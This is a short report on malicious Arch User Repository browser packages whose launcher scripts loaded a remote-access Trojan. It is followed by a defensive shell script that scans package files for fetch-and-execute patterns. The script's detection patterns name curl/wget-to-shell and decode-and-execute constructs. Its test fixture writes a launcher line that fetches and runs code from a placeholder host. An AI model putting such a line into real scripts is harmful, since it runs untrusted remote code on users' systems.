Malicious code has been reported in custom browser builds published in the AUR (Arch User Repository), which Arch Linux uses to distribute third-party packages. Along with the malicious packages Firefox-Patch-Bin, Librewolf-Fix-Bin, and Zen-Browser-Patched-Bin, the package google-chrome-stable was also found to contain a malicious component that provides remote access to the system.
The issue was identified in the PKGBUILD file, where the browser launch script google-chrome-stable.sh was found to contain a command that loaded malicious software. This software, identified as a Trojan by virus scanning services, allows remote control of the system: launching processes, transferring files, inspecting traffic, and taking screenshots.
The malicious package google-chrome-stable was uploaded and then removed by AUR administrators a few hours after it appeared. Subsequently, two more malicious packages named “chrome” and “chrome-bin” were uploaded to AUR, further exacerbating the situation.
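
The launcher-script tampering described above is the kind of change a pre-build review of the package sources can catch. The following is an added example, not code from the incident or from the AUR project: a POSIX shell check that flags fetch-and-execute constructs in a cloned package's PKGBUILD, .install files and shell scripts. The three patterns are generic heuristics, and the package name example-browser-bin, its paths and the example.invalid URL are constructed placeholders.

```shell
#!/bin/sh
# Added example: pre-build review of a cloned AUR package for build or launcher
# scripts that fetch remote content and execute it. The patterns are generic
# heuristics (assumptions), not indicators taken from the incident.

# Fetch piped straight into an interpreter: curl ... | sh
PIPE_TO_INTERP='(curl|wget)[^|]*[|][[:space:]]*(sudo[[:space:]]+)?((ba|da|z)?sh|python[0-9.]*|perl)([^[:alnum:]_]|$)'
# Fetch inside a command substitution: python -c "$(curl ...)", eval "$(wget ...)"
SUBST_FETCH='\$\([[:space:]]*(curl|wget)[[:space:]]'
# Encoded blob decoded and executed: ... | base64 -d | sh
DECODE_EXEC='base64[[:space:]]+(-d|--decode)[^|]*[|][[:space:]]*((ba|da|z)?sh|python[0-9.]*)([^[:alnum:]_]|$)'

# scan_aur_sources DIR: print file:line:text for every hit; return 1 if any.
scan_aur_sources() {
  # /dev/null forces grep to print the file name even for a single file;
  # "|| true" absorbs grep's exit status 1 when nothing matches.
  findings=$(find "$1" -type f \( -name PKGBUILD -o -name '*.install' -o -name '*.sh' \) \
    -exec grep -nE -e "$PIPE_TO_INTERP" -e "$SUBST_FETCH" -e "$DECODE_EXEC" /dev/null {} + || true)
  [ -z "$findings" ] && return 0
  printf '%s\n' "$findings"
  return 1
}

# make_sample_pkg DIR KIND: write a constructed package (hypothetical name
# example-browser-bin, placeholder URL) whose launcher is "clean" or "tampered".
make_sample_pkg() {
  mkdir -p "$1"
  cat > "$1/PKGBUILD" <<'EOF'
pkgname=example-browser-bin
pkgver=1.0
source=("example-browser.deb" "example-browser.sh")
package() {
  install -Dm755 "$srcdir/example-browser.sh" "$pkgdir/usr/bin/example-browser"
}
EOF
  printf '#!/bin/sh\n' > "$1/example-browser.sh"
  if [ "$2" = tampered ]; then
    printf 'python -c "$(curl -s https://example.invalid/stage)" &\n' >> "$1/example-browser.sh"
  fi
  printf 'exec /opt/example-browser/browser "$@"\n' >> "$1/example-browser.sh"
}

# Usage: sh scan.sh /path/to/cloned-aur-package
if [ -n "${1:-}" ]; then scan_aur_sources "$1"; fi
```

A clean result only means none of these three constructs is present; the PKGBUILD and every script it installs still need to be read before running makepkg.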